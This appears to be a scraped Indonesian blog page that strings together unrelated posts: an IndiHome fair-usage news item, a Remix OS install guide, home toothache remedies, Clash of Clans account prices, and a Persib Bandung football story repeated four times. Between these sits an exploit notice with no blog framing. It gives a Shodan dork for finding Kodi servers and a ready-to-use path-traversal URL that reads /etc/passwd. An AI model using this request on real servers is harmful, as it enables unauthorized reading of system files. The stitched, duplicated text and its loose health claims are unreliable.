LATEST NEWS
Memuat dulu brooo....

Ngeeblog Yuuk!, Setelah isu pemblokiran Netflix, Telkom kembali menjadi buah bibir setelah menetapkan kebijakan Fair Usage Policy (FUP) terhadap layanan internet IndiHome.

Menurut keterangan resmi Telkom, kebijakan FUP ini untuk melindungi pengguna yang wajar (normal user) dari pemanfaatan pemakaian berlebihan (tidak wajar) oleh pengguna berat (heavy user). Negara-negara lain seperti Amerika Serikat, Jepang dan Malaysia pun disebut Telkom telah menerapkan FUP, demikian juga operator-operator di Indonesia.

Dari kacamata Telkom, FUP dianggap perlu karena biasanya heavy user menyalahgunakan fasilitas unlimited yang diberikan untuk bisnis warnet atau download untuk bisnis film/games bajakan sehingga pemakaian mereka menjadi tidak wajar dan berakibat mengganggu rasa keadilan dan kenyamanan bagi pengguna lain yang membayar dengan tarif yang sama.

"Bahkan ada juga pelanggan yang menjual kembali layanan internet kepada tetangga-tetangga di sekitarnya," ujar BUMN telekomunikasi ini.

FUP yang dipatok Telkom melalui IndiHome sendiri pun diklaim sudah sangat leluasa untuk pemakaian rumah tangga. Sebagai contoh untuk layanan 10 Mbps, IndiHome memberikan fair usage 300 GB atau setara nonton film kualitas SD selama 1.800 jam atau kurang lebih 1.200 film.

Sebagai perbandingan, FUP di Malaysia adalah 120 GB. Untuk layanan IndiHome, setelah FUP, speed dijanjikan masih cukup bagus pada 7,5 Mbps. Telkom menegaskan, dari hasil trial yang dilakukan, tidak ada pelanggan yang komplain karena terkena FUP.

"Yang komplain ternyata yang melakukan resell seperti warnet dan mini operator tanpa lisensi", ujar Dian Rachmawan, Direktur Consumer Telkom.

"Pelanggan pada umumnya tidak perlu khawatir dengan batasan FUP ini karena sangat longgar dan hampir tidak pernah melampaui batasan FUP tersebut," lanjutnya.

FUP Membatasi Streaming?

Streaming video melalui internet memang memakan bandwidth yang besar dan akan boros apabila streaming dilakukan ke server di luar negeri. Untuk itu, Telkom akan mewadahinya dalam platform Video OTT (Over-The-Top), sehingga sama sekali tidak akan menggunakan batasan FUP pelanggan.

Sebagaimana diketahui, IndiHome adalah layanan Triple Play: Play pertama adalah Phone, Play kedua adalah Video UseeTV (hybrid IPTV dan OTT) dan Play ketiga adalah internet.

"Streaming berbayar Video On Demand seperti Netflix, iFlix, CatchPlay dan HOOQ di samping free streaming seperti YouTube akan berada pada platform Video UseeTV (play ke dua), dan menjadi partner content yang memperkaya UseeTV Indihome sekaligus menghemat bandwidth ke luar negeri dan meningkatkan trafik Internet di dalam negeri".

"Saat ini Telkom sedang mengembangkan platform hybrid OTT di samping eksisting IPTV. Layanan ini direncanakan akan diimplementasikan pada semester dua, tahun 2016 ini," tandas Telkom.

sumber : 
http://inet.detik.com/read/2016/02/03/095245/3133507/328/ramai-ramai-fup-indihome-telkom-yang-komplain-warnet
Ngeeblog Yuuk!, Apakah Anda pernah memiliki keinginan untuk menginstall dan menggunakan sistem operasi Android di PC Desktop atau laptop Anda? Seperti yang kita ketahui, sistem operasi Android merupakan OS yang khusus dibuat untuk smartphone dan tablet. Selain gratis, sistem operasi Android dapat dikatakan merupakan salah satu sistem operasi yang paling ringan hingga saat ini sehingga jika kita dapat menginstall sistem operasi ini di komputer biasa hal tersebut sangatlah menyenangkan. Dengan install Android di komputer, kita dapat mengakses Google Play Store, menginstall, dan menggunakan aplikasi favorit kita langsung tanpa bantuan aplikasi tambahan.

Install Remix OS

Remix OS merupakan sistem operasi portable, gratis, dan ringan yang dikembangkan oleh Jide yang mana dapat kita install di USB Flashdisk / Drive dan dapat kita gunakan sebagai sistem operasi live di PC dan Laptop. Remix OS berbasis Android Lollipop 5.1 yang telah dimodifikasi sedemikian rupa sehingga memiliki antarmuka seperti Windows atau Mac OS. Ia hadir dengan Start menu, Taskbar, dan program layaknya di Windows dengan titlebar dan tombol minimize, maximize, dan keluar.

Remix OS sangat ringan dan dapat digunakan hampir pada semua PC. Jika Anda memiliki PC jadul, Anda dapat mencoba untuk menginstall Remix OS pada komputer tersebut, saya yakin PC jadul Anda tidak akan keberatan. Antarmuka yang ia sediakan minimalis dan sangat bersih dengan tampilan khas ala Android OS.
Jide telah menanamkan aplikasi penting di dalamnya seperti Microsoft Office apps, Google Chrome, aplikasi surel, Facebook, Twitter, Pinterest, Evernote, dan lainnya. Ia juga hadir dengan Google Play Store sehingga Anda dapat menginstall aplikasi atau game favorit Anda langsung dari Remix OS.
Anda dapat menggunakan mouse sama seperti di Windows dan Mac OS. Fitur mouse yang tersedia saat ini antara lain: klik kanan, klik kiri, dan klik ganda. Di Remix OS, Anda dapat mengecek pemberitahuan (notifications) melalui Notification Center sama seperti di Windows 10.


Semua aplikasi yang ada telah diatur secara sempurna di diorganisasi di Start menu yang mana dapat diakses dengan cara mengklik logo Jide (tombol Start menu) yang ada di pojok kiri bawah tasbar. Di Start menu, Anda dapat menemukan semua aplikasi yang telah terinstall ditambah tombol power untuk me-restart dan mematikan komputer Anda. 

 
Ia juga hadir dengan File Manager yang cukup mumpuni dan bekerja sama seperti File Explorer yang ada di Windows 10. Antarmuka yang disediakan sangat rapi dan bersih dan memiliki kinerja yang sangat halus dan lancar. File Manager yang ia miliki juga memiliki panel navigasi di sebelah kirinya yang berguna untuk mengakses folder dan shortcut.

Anda dapat menjalankan beberapa aplikasi sekaligus (multitasking) tanpa ada masalah sedikitpun. Semua aplikasi yang terbuka terorganisir di taskbar dan memiliki titlebar + caption, dijamin Anda akan merasakan layaknya sistem operasi komputer biasa ketika menggunakan Remix OS.
Pada taksbar, terdapat Notification area yang mana menampilkan ikon-ikon seperti volume, jaringan, jam, dan lainnya persis seperti yang ada pada Windows dan Mac OS.
Remix OS juga menyediakan pintasan keyboard pada umumnya seperti CTRL+N untuk membuat dokumen baru, CTRL+S untuk menyimpan dokumen, Alt+F4 untuk menutup jendela, Alt+Tab untuk berpindah antar jendela, dan banyak lagi.
Jide mengklaim, mereka akan terus merilis update untuk OS ini secara berkala untuk menyediakan keamanan yang lebih baik dan perbaikan-perbaikan bug yang ditemukan.
Hal yang sangat menarik dari OS ini ialah sifatnya yang portable sehingga Anda dapat menginstallnya di flashdisk lalu menggunakannya hampir pada semua komputer. Untuk boot melalui flashdisk, Anda harus mengubah urutan booting komputer Anda melalui BIOS dan memilih legacy boot mode. Saat ini mode yang disediakan ada dua, yaitu:
  • Guest Mode
  • Resident Mode
 

Guest Mode berkerja sebagai live OS namun tiap data dan pengaturan tidak akan disimpan. Tiap kali Anda menggunakan Guest Mode, Anda akan melihat tampilan awal Remix OS. Anda dapat menggunakan mode ini untuk melakukan pengujian.
Resident Mode berkerja seperti OS pada umumnya. Semua data dan pengaturan disimpan secara default. Anda dapat menggunakan mode ini jika Anda ingin menggunakan Remis OS sebagai sistem operasi utama Anda.
Setelah dinyalakan, Anda dapat menggunakan Remix OS layaknya sistem operasi pada umumnya seperti Windows, Mac OS, dan distro Linux. Ketika menggunakan Remix OS, ia memberikan nuansa yang hampir sama seperti Chrome OS. Cobalah sistem operasi terbaru ini, saya jamin Anda akan menyukainya.

Download Remix OS

Remix OS tersedia secara gratis untuk di download. Halaman di bawah ini menyediakan file full offline ISO dan juga aplikasi yang dapat membantu kita untuk menginstall Remix OS di USB Flashdisk.
Download Remix OS

Di website Remix OS, klik tombol “Free download” atau “Download Now” lalu centang “I am a developer and have read the above message” dan klik tombol “Download“. Browser Anda akan memulai proses download dengan tipe file ZIP yang mana terdapat file ISO dan aplikasi untuk menginstall di flashdisk di dalamnya.

Install Remix OS di Flashdisk (Live / Portable OS)

Setelahs selesai di download, ekstral file ZIP tadi menggunakan aplikasi pengarsipan seperti 7-Zip atau WinRAR. Jalankan aplikasi “Remix OS USB Tool”. Setelah jendela aplikasi Remix OS USB Tool terbuka, ia akan langsung mendeteksi flashdisk yang dicolokan ke komputer. Pilih ISO Remis OS menggunakan tombol Browse lalu klik OK.



Setelah itu, aplikasi akan memulai proses install yang memakan waktu beberapa menit. Setelah proses install selesai, Anda dapat boot flashdisk ini di komputer Anda. Tekan F12 ketika booting untuk memilih USB Flashdisk sebagai opsi booting.

Ngeeblog Yuuk!, Selamat malam para agan blogger ;) kali ini saya akan memposting gimana sih cara mengobati sakit gigi?, yuk disimak ya 10 macam caranya.

1. Cara menyikat gigi yang salah
Bicara tentang sikat gigi, pasti rata-rata orang menganggap kegiatan ini mudah dilakukan, tapi ternyata kebanyakan dari mereka masih salah melakukannya. Sebuah penelitian mengatakan waktu menyikat gigi yang baik berkisar antara 1 menit sampai 2 menit. Jadi dalam menggosok gigi ini kita mesti mengusahakan untuk menyikat gigi dengan cara memutar-mutar dan untuk lebih maksimal menyikat giginya depan cermin biar keliatan sisa sisa makanan yang ada disela-sela gigi. Ada lagi nih, setelah mengkonsumsi minuman berenergi, bersoda,dan asam lainnya, jangan langsung menyikat gigi. Karena menyikat gigi bisa menyebabkan zat asam tersebut tersebar merata di semua gigi. Jadi berkumur-kumur aja dulu biar bakterinya yang ada ilang, baru deh sikat giginya .
 
2. Frekuensi yang jarang
Biasanya Sikat gigi dilakuka setiap kali mandi secara rutin. dua kali dalam sehari adalah angka minimal untuk menyikat gigi. Tau gak sih..Jarang menyikat gigi dapat mengakibatkan gigi mengalami kerusakan permanen dan gigi lebih rapuh. Makadari itu untuk mendapatkan hasil maksimal, jadi frekuensi sikat gigi yang lebih sering akan meminimalisir pertumbuhan bakteri pada gigi and menjaga kebersihan gigi .maka dari itu mari biasain untuk sikat gigi 15 menit setelah makan dan sebelum tidur.
 
3. Alat yang digunakan
Bicara soal alat yang digunakan , Gigi geraham adalah gigi yang paling sering bermasalah, karena terletak di belakang dan membuatnya agak sulit terjangkau oleh sikat gigi. Bentuk mulut juga berpengaruh. Bentuk mulut yang cenderung menyempit di bagian belakang juga akan mempersulit pembersihannya, belum lagi jika bentuk kepala sikat gigi yang cenderung besar.
 
4. Makanan terlalu manis
Bahas maslah manis siapa sih yang gak suka? tapi tau gak sih gula adalah salah zat yang menjadi penyebab gigi mudah berlubang. Jadi usahakan zat gula yang masih tersisa di sela-sela gigi di besihkan kerena akan menjadi penyebab gigi berlubang. Kurangilah mengkonsumsi makanan dan minuman yang terlalu yang banyak mengandung gula.
 

Apa yang Harus anda lakukan untuk mengobati sakit Gigi yang Berlubang? 

1. Membersihkan Mulut / Gigi
 
Membersihkan Mulut dan Gigi
Bakteri adalah penyebab utama sakit gigi karena bakteri dapat menyebabkan kerusakan pada gigi dan gusi. Jadi jangan lupa or malas untuk membersihkan mulut terutama setalah kalian selesai makan.
 
2. Jeruk Nipis
 
Jeruk Nipis untuk sakit gigi
Jeruk nipis juga obat loh. caranya teteskan sesendok demi sesendok pada bagian gigi yang sakit setiap 10 menit, sampai sari jeruknya habis. Vitamin C pada sari jeruk juga bisa meredakan sakit gigi dan itulah jeruk nipis menjadi salah satu cara mengobati sakit gigi belubang
 
3. Garam
 
Garam untuk sakit gigi

Ternyata dibalik rasa asin pada garam ada kandungan yodium yang ternyata bisa meringankan ngilu pada gigi. Gini nih caranya, larutkan garam dalam segelas air mineral hangat kemudian Aduk, abis itu gunakan sebagai mouthwash sampai kalian merasa cukup nyaman dan gak terlalu tersiksa karena rasa sakit gigi. Tapi, kalian gak dianjurkan langsung mengunyah garamnya, karena penyebarannya tidak sampai pada sela -sela gigi.
 
4. Belimbing Wuluh
 
Belimbing Wuluh untuk sakit gigi
Caranya Ambil beberapa buah belimbing wuluh Cuci bersih, kedian makan dengan menggunakan garam. Kunyah perlahan dengan menggunakan gigi yang sakit.
 

5. Cengkeh
 
Garam untuk sakit gigi
Cengkeh juga bisa mengurangi rasa sakit pada gigi karena Cengkeh ini memiliki anti - inflamasi, antioksidan, anti bakteri dan sifat anestesi. Caranya semprotkan sedikit minyak cengkeh ke kapas lalu tempelin pada gigi yang sakit. kalian juga bisa campurin beberapa tetes minyak cengkeh ke dalam gelas berisi air untuk berkumur.
Ngeeblog Yuuk!, Buat kamu para pengguna smartphone Android, pastinya sudah tak asing lagi dengan game bernama Clash of Clans atau COC. Game bergenre perang online tersebut kini menjadi salah satu game perangkat mobile terpopuler di dunia.
Bicara soal Clash of Clans alias COC, banyak para pemainnya memainkan game ini bukan hanya untuk bersenang-senang saja, melainkan untuk dijual agar mendapatkan uang. Jadi mereka membuat akun dan memainkannya sampai level tinggi kemudian menjualnya ke pemain lain. Namun masalahnya adalah, kadang penjual dan pembeli akun COC kesulitan menentukan berapa harga jual dari akun tersebut, mengingat harga akun dari penjual satu dengan penjual lain juga berbeda.
Nah, pada kesempatan kali ini ngeeblog yuuk!, akan berbagi sedikit informasi mengenai daftar harga jual akun COC mulai dari TH 1 sampai TH 10 di pasaran. Bagi kamu yang penasaran dan ingin tahu informasi lengkapnya.


1. Harga Akun COC TH 1, 2, 3, 4, dan 5
Perlu diketahui bahwa untuk akun COC TH 1 sampai 5 masih belum ada harganya, alias tidak bisa dijual. Pasalnya akun tersebut masih kecil dan kurang menarik. Untuk membuat akun COC mulai dari TH 1 sampai TH 5 hanya memerlukan waktu 1 bulanan saja. Jadi jika anda ingin menjual akun, bisa diupgrade ke TH yang lebih tinggi.
2. Harga Akun COC TH 6
Untuk pasaran harga akun COC TH 6 defense max berada di angka 25 ribu rupiah. Namun jika troopsnya ikut max, maka bisa ditambah 25 ribu. Jadi kisaran harga akun COC TH 6 mulai dari 25 ribu sampai 50 ribu.
3. Harga Akun COC TH 7
Untuk pasaran harga akun COC TH 7 defense max sekitar 100 ribu. Namun jika troopsnya max, bisa ditambah 75 ribu. Untuk barbarian king level max (5) bisa ditambah 25 ribu. Jadi pasaran harga akun COC TH 7 mulai dari 100 ribu sampai 200 ribu.
4. Harga Akun COC TH 8
Untuk pasaran harga akun COC TH 8 defense max sekitar 500 ribu. Namun jika troopsnya max, bisa ditambah 250 ribu. Untuk barbarian king level max (10) bisa ditambah 100 ribu. Apabila wallnya ikut max, bisa ditambah 225 ribu.
5. Harga Akun COC TH 9
Untuk pasaran harga akun COC TH 9 defense max sekitar 1.620 ribu. Namun jika troopsnya max, bisa ditambah 550 ribu. Untuk barbarian king level max (30) bisa ditambah 500 ribu. Max spell dan dark troops bisa juga menambah harga.
6. Harga Akun COC TH 10
Untuk pasaran harga akun COC TH 10 defense max sekitar 3.450 ribu. Namun jika troopsnya max, bisa ditambah 710 ribu. Untuk barbarian king level max (40) bisa ditambah 800 ribu. Max spell dan dark troops bisa juga menambah harga.

# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a

kodi web interface vulnerable to arbitrary file read.

example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


for passwd

​(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)
Ngeeblog-Yuuk!, Manajer Persib Bandung, Umuh Muchtar, menegaskan bahwa skuat Pangeran Biru takkan dibubarkan meski gelaran turnamen Piala Presiden sudah usai.

Sebagaimana diketahui, Persib keluar sebagai juara turnamen gelaran Mahaka Sports and Entertainment dan berhak atas hadiah uang senilai Rp2 miliar. Skuat juara Piala Presiden pun akan dipertahankan sampai ada turnamen selanjutnya.

Konflik PSSI dan Kemenpora diharapkan Umuh cepat selesai sehingga sepakbola Indonesia kembali jelas. "Ke depan saya mengharapkan mudah-mudahan ada jalan yang terbaik. Bila perlu, cepat selesaikan! Bagaimana caranya? Pokoknya selesaikan," tegas Umuh ditemui di Jakarta, Senin (19/10).

Pria berkumis tebal itu pun menambahkan bahwa akan ada turnamen layaknya Piala Presiden, di mana Maung Bandung siap untuk ambil bagian. "Terdekat, nanti bakal ada turnamen lagi. Sekitar 10-11 November seperti Piala Presiden, nanti kami akan ikut lagi. Skuat pokoknya bakal tetap," tandas dia.

Ngeeblogyuuk!, - Setelah menghadapi babak final turnamen Piala Presiden 2015, skuat Persib Bandung kembali akan dihadapkan dengan sebuah laga internasional. Hal itu diungkapkan secara langsung oleh Manajer Persib Bandung, Umuh Muchtar.

Akan tetapi, Umuh mengaku belum mengetahui laga yang rencananya akan digelar pada 10 November tersebut berbentuk turnamen, kompetisi atau hanya laga persahabatan saja. "Saya sudah dapat bisikan dan sudah dapat bocoran kalau tanggal 10 November juga akan dimulai lagi. Tapi tidak tahu bentuknya turnamen atau gimana. Cuma yang jelas, akan ada lagi pertandingan untuk Persib," ujar Umuh, Minggu (18/10/2015).

Bahkan pria yang akrab disapa Pak Haji ini juga belum mengetahui siapa penggagas laga tersebut. Namun kemungkinan besar akan digelar kembali oleh Mahaka Sports and Entertainment yang merupakan penggagas turnamen Piala Presiden 2015. "Yang saya dengar sih dari Mahaka juga. Tapi pihak lain ada juga yang akan menyelenggarakan (pertandingan), malahan secepatnya," tuturnya.

Hal senada diungkapkan Pelatih Persib Bandung, Djadjang Nurdjaman. Pelatih asal Majalengka ini tak memungkiri tim Maung Bandung sudah mendapatkan tawaran untuk berlaga dalam sebuah pertandingan. Namun informasi yang didapat bukan untuk pertandingan pada 10 November melainkan pada 24 Oktober.

Kabarnya, laga 24 Oktober nanti digagas secara langsung oleh MNCTV dengan mempertemukan Persib Bandung melawan tim Malaysia Selection dalam laga bertajuk persahabatan. Djanur pun berharap, laga persahabatan tersebut dapat digelar sesuai rencana. Sebab akan menjadi keuntungan bagi timnya, khususnya bagi para pemainnya agar kembali memiliki kegiatan lantaran kompetisi Indonesia Super League (ISL) 2015 belum juga menemui kejelasan. "Ya, mudah-mudahan saja jadi," harap Djanur.

Menghadapi Malaysia Selection sendiri bukan kali pertama dilakukan Persib. Tepat, pada 2 Oktober 2014 lalu, tim berjuluk Pangeran Biru sempat mencicipi laga melawan klub tetangga. Laga yang digelar di Stadion Gelora Bandung Lautan Api (GBLA) itu berakhir dengan skor akhir 3-0 yang dimenangkan Persib Bandung melalui gol Djibril Coulibaly, Makan Konate dan Ferdinand Alferd Sinaga.
JAKARTA - Setelah menghadapi babak final turnamen Piala Presiden 2015, skuat Persib Bandung kembali akan dihadapkan dengan sebuah laga internasional. Hal itu diungkapkan secara langsung oleh Manajer Persib Bandung, Umuh Muchtar.

Akan tetapi, Umuh mengaku belum mengetahui laga yang rencananya akan digelar pada 10 November tersebut berbentuk turnamen, kompetisi atau hanya laga persahabatan saja. "Saya sudah dapat bisikan dan sudah dapat bocoran kalau tanggal 10 November juga akan dimulai lagi. Tapi tidak tahu bentuknya turnamen atau gimana. Cuma yang jelas, akan ada lagi pertandingan untuk Persib," ujar Umuh, Minggu (18/10/2015).

Bahkan pria yang akrab disapa Pak Haji ini juga belum mengetahui siapa penggagas laga tersebut. Namun kemungkinan besar akan digelar kembali oleh Mahaka Sports and Entertainment yang merupakan penggagas turnamen Piala Presiden 2015. "Yang saya dengar sih dari Mahaka juga. Tapi pihak lain ada juga yang akan menyelenggarakan (pertandingan), malahan secepatnya," tuturnya.

Hal senada diungkapkan Pelatih Persib Bandung, Djadjang Nurdjaman. Pelatih asal Majalengka ini tak memungkiri tim Maung Bandung sudah mendapatkan tawaran untuk berlaga dalam sebuah pertandingan. Namun informasi yang didapat bukan untuk pertandingan pada 10 November melainkan pada 24 Oktober.

Kabarnya, laga 24 Oktober nanti digagas secara langsung oleh MNCTV dengan mempertemukan Persib Bandung melawan tim Malaysia Selection dalam laga bertajuk persahabatan. Djanur pun berharap, laga persahabatan tersebut dapat digelar sesuai rencana. Sebab akan menjadi keuntungan bagi timnya, khususnya bagi para pemainnya agar kembali memiliki kegiatan lantaran kompetisi Indonesia Super League (ISL) 2015 belum juga menemui kejelasan. "Ya, mudah-mudahan saja jadi," harap Djanur.

Menghadapi Malaysia Selection sendiri bukan kali pertama dilakukan Persib. Tepat, pada 2 Oktober 2014 lalu, tim berjuluk Pangeran Biru sempat mencicipi laga melawan klub tetangga. Laga yang digelar di Stadion Gelora Bandung Lautan Api (GBLA) itu berakhir dengan skor akhir 3-0 yang dimenangkan Persib Bandung melalui gol Djibril Coulibaly, Makan Konate dan Ferdinand Alferd Sinaga.

source: http://soccer.sindonews.com/read/1054023/58/persib-sudah-dapat-tawaran-laga-internasional-1445150062
JAKARTA - Setelah menghadapi babak final turnamen Piala Presiden 2015, skuat Persib Bandung kembali akan dihadapkan dengan sebuah laga internasional. Hal itu diungkapkan secara langsung oleh Manajer Persib Bandung, Umuh Muchtar.

Akan tetapi, Umuh mengaku belum mengetahui laga yang rencananya akan digelar pada 10 November tersebut berbentuk turnamen, kompetisi atau hanya laga persahabatan saja. "Saya sudah dapat bisikan dan sudah dapat bocoran kalau tanggal 10 November juga akan dimulai lagi. Tapi tidak tahu bentuknya turnamen atau gimana. Cuma yang jelas, akan ada lagi pertandingan untuk Persib," ujar Umuh, Minggu (18/10/2015).

Bahkan pria yang akrab disapa Pak Haji ini juga belum mengetahui siapa penggagas laga tersebut. Namun kemungkinan besar akan digelar kembali oleh Mahaka Sports and Entertainment yang merupakan penggagas turnamen Piala Presiden 2015. "Yang saya dengar sih dari Mahaka juga. Tapi pihak lain ada juga yang akan menyelenggarakan (pertandingan), malahan secepatnya," tuturnya.

Hal senada diungkapkan Pelatih Persib Bandung, Djadjang Nurdjaman. Pelatih asal Majalengka ini tak memungkiri tim Maung Bandung sudah mendapatkan tawaran untuk berlaga dalam sebuah pertandingan. Namun informasi yang didapat bukan untuk pertandingan pada 10 November melainkan pada 24 Oktober.

Kabarnya, laga 24 Oktober nanti digagas secara langsung oleh MNCTV dengan mempertemukan Persib Bandung melawan tim Malaysia Selection dalam laga bertajuk persahabatan. Djanur pun berharap, laga persahabatan tersebut dapat digelar sesuai rencana. Sebab akan menjadi keuntungan bagi timnya, khususnya bagi para pemainnya agar kembali memiliki kegiatan lantaran kompetisi Indonesia Super League (ISL) 2015 belum juga menemui kejelasan. "Ya, mudah-mudahan saja jadi," harap Djanur.

Menghadapi Malaysia Selection sendiri bukan kali pertama dilakukan Persib. Tepat, pada 2 Oktober 2014 lalu, tim berjuluk Pangeran Biru sempat mencicipi laga melawan klub tetangga. Laga yang digelar di Stadion Gelora Bandung Lautan Api (GBLA) itu berakhir dengan skor akhir 3-0 yang dimenangkan Persib Bandung melalui gol Djibril Coulibaly, Makan Konate dan Ferdinand Alferd Sinaga.

source: http://soccer.sindonews.com/read/1054023/58/persib-sudah-dapat-tawaran-laga-internasional-1445150062
Setelah menghadapi babak final turnamen Piala Presiden 2015, skuat Persib Bandung kembali akan dihadapkan dengan sebuah laga internasional. Hal itu diungkapkan secara langsung oleh Manajer Persib Bandung, Umuh Muchtar.

Akan tetapi, Umuh mengaku belum mengetahui laga yang rencananya akan digelar pada 10 November tersebut berbentuk turnamen, kompetisi atau hanya laga persahabatan saja. "Saya sudah dapat bisikan dan sudah dapat bocoran kalau tanggal 10 November juga akan dimulai lagi. Tapi tidak tahu bentuknya turnamen atau gimana. Cuma yang jelas, akan ada lagi pertandingan untuk Persib," ujar Umuh, Minggu (18/10/2015).

Bahkan pria yang akrab disapa Pak Haji ini juga belum mengetahui siapa penggagas laga tersebut. Namun kemungkinan besar akan digelar kembali oleh Mahaka Sports and Entertainment yang merupakan penggagas turnamen Piala Presiden 2015. "Yang saya dengar sih dari Mahaka juga. Tapi pihak lain ada juga yang akan menyelenggarakan (pertandingan), malahan secepatnya," tuturnya.

Hal senada diungkapkan Pelatih Persib Bandung, Djadjang Nurdjaman. Pelatih asal Majalengka ini tak memungkiri tim Maung Bandung sudah mendapatkan tawaran untuk berlaga dalam sebuah pertandingan. Namun informasi yang didapat bukan untuk pertandingan pada 10 November melainkan pada 24 Oktober.

Kabarnya, laga 24 Oktober nanti digagas secara langsung oleh MNCTV dengan mempertemukan Persib Bandung melawan tim Malaysia Selection dalam laga bertajuk persahabatan. Djanur pun berharap, laga persahabatan tersebut dapat digelar sesuai rencana. Sebab akan menjadi keuntungan bagi timnya, khususnya bagi para pemainnya agar kembali memiliki kegiatan lantaran kompetisi Indonesia Super League (ISL) 2015 belum juga menemui kejelasan. "Ya, mudah-mudahan saja jadi," harap Djanur.

Menghadapi Malaysia Selection sendiri bukan kali pertama dilakukan Persib. Tepat, pada 2 Oktober 2014 lalu, tim berjuluk Pangeran Biru sempat mencicipi laga melawan klub tetangga. Laga yang digelar di Stadion Gelora Bandung Lautan Api (GBLA) itu berakhir dengan skor akhir 3-0 yang dimenangkan Persib Bandung melalui gol Djibril Coulibaly, Makan Konate dan Ferdinand Alferd Sinaga.

source: http://soccer.sindonews.com/read/1054023/58/persib-sudah-dapat-tawaran-laga-internasional-1445150062